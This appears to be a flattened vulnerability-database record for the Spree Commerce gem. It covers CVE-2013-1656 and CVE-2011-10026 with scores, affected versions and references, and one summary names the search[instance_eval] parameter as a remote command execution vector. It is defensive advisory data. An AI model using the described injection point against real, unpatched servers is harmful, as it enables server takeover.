reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/spree/spree/commit/70092eb55b8be8fe5d21a7658b62da658612fba7
7
reference_url https://nvd.nist.gov/vuln/detail/CVE-2013-1656
reference_id
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2013-1656
8
reference_url https://web.archive.org/web/20130907044454/https://www.conviso.com.br/advisories/CVE-2013-1656.txt
reference_id
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url https://web.archive.org/web/20130907044454/https://www.conviso.com.br/advisories/CVE-2013-1656.txt
9
reference_url https://web.archive.org/web/20140329142330/http://spreecommerce.com/blog/multiple-security-vulnerabilities-fixed
reference_id
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url https://web.archive.org/web/20140329142330/http://spreecommerce.com/blog/multiple-security-vulnerabilities-fixed
10
reference_url https://web.archive.org/web/20140618100330/http://blog.conviso.com.br/2013/03/spree-commerce-multiple-unsafe.html
reference_id
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url https://web.archive.org/web/20140618100330/http://blog.conviso.com.br/2013/03/spree-commerce-multiple-unsafe.html
fixed_packages
0
url pkg:gem/spree@1.3.3
purl pkg:gem/spree@1.3.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-153y-kwk2-xyfd
1
vulnerability VCID-cwh1-mmky-ukcx
2
vulnerability VCID-s4mu-v75h-dfep
3
vulnerability VCID-y37s-b27m-n7ad
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/spree@1.3.3
1
url pkg:gem/spree@2.0.0.rc1
purl pkg:gem/spree@2.0.0.rc1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-153y-kwk2-xyfd
1
vulnerability VCID-cwh1-mmky-ukcx
2
vulnerability VCID-s4mu-v75h-dfep
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/spree@2.0.0.rc1
2
url pkg:gem/spree@2.0.0
purl pkg:gem/spree@2.0.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-153y-kwk2-xyfd
1
vulnerability VCID-cwh1-mmky-ukcx
2
vulnerability VCID-s4mu-v75h-dfep
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/spree@2.0.0
aliases CVE-2013-1656, GHSA-jxx8-v83v-rhw3
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-y37s-b27m-n7ad
Fixing_vulnerabilities
0
url VCID-w5fg-qcqv-uugu
vulnerability_id VCID-w5fg-qcqv-uugu
summary 
Spree Commerce is vulnerable to RCE through Search API
Spreecommerce versions prior to 0.50.x contain a remote command
execution vulnerability in the API's search functionality. Improper
input sanitation allows attackers to inject arbitrary shell commands
via the search[instance_eval] parameter, which is dynamically invoked
using Ruby’s send method. This flaw enables unauthenticated attackers
to execute commands on the server.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2011-10026
reference_id
reference_type
scores
0
value 0.68643
scoring_system epss
scoring_elements 0.98637
published_at 2026-06-09T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2011-10026
1
reference_url https://github.com/advisories/GHSA-x485-rhg3-cqr4
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3
scoring_elements
1
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-x485-rhg3-cqr4
2
reference_url https://github.com/spree
reference_id
reference_type
scores
0
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-08-20T18:45:19Z/
url https://github.com/spree
3
reference_url https://github.com/spree/spree
reference_id
reference_type
scores
0
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/spree/spree
4
reference_url https://github.com/spree/spree/commit/0a9a360c590829d8a377ceae0cf997bbbbcc2df4
reference_id
reference_type
scores
0
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/spree/spree/commit/0a9a360c590829d8a377ceae0cf997bbbbcc2df4
5
reference_url https://github.com/spree/spree/commit/3b559e7219f3681184be409ad00cd34a34a37978
reference_id
reference_type
scores
0
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/spree/spree/commit/3b559e7219f3681184be409ad00cd34a34a37978
6
reference_url https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/spree_searchlogic_exec.rb
reference_id
reference_type
scores
0
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-08-20T18:45:19Z/
url https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/spree_searchlogic_exec.rb
7
reference_url https://web.archive.org/web/20111120023342/http://spreecommerce.com/blog/2011/04/19/security-fixes
reference_id
reference_type
scores
0
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-08-20T18:45:19Z/
url https://web.archive.org/web/20111120023342/http://spreecommerce.com/blog/2011/04/19/security-fixes
8
reference_url https://www.exploit-db.com/exploits/17199
reference_id
reference_type
scores
0
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-08-20T18:45:19Z/
url https://www.exploit-db.com/exploits/17199
9
reference_url https://www.vulncheck.com/advisories/spreecommerce-api-rce
reference_id
reference_type
scores
0
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-08-20T18:45:19Z/
url https://www.vulncheck.com/advisories/spreecommerce-api-rce
10
reference_url https://nvd.nist.gov/vuln/detail/CVE-2011-10026
reference_id CVE-2011-10026
reference_type
scores
0
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2011-10026
11
reference_url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rd_searchlogic/CVE-2011-10026.yml
reference_id CVE-2011-10026.YML
reference_type
scores
0
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rd_searchlogic/CVE-2011-10026.yml
12
reference_url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree/CVE-2011-10026.yml
reference_id CVE-2011-10026.YML
reference_type
scores
0
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree/CVE-2011-10026.yml
fixed_packages
0
url pkg:gem/spree@0.50.0
purl pkg:gem/spree@0.50.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-153y-kwk2-xyfd
1
vulnerability VCID-7jum-4ny7-xuhy
2
vulnerability VCID-cwh1-mmky-ukcx
3
vulnerability VCID-s4mu-v75h-dfep
4
vulnerability VCID-t9gu-2vs3-g7cu
5
vulnerability VCID-y37s-b27m-n7ad
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/spree@0.50.0
aliases CVE-2011-10026, GHSA-x485-rhg3-cqr4
risk_score 10.0
exploitability 2.0
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-w5fg-qcqv-uugu
Risk_score10.0
Resource_urlhttp://public2.vulnerablecode.io/packages/pkg:gem/spree@0.50.0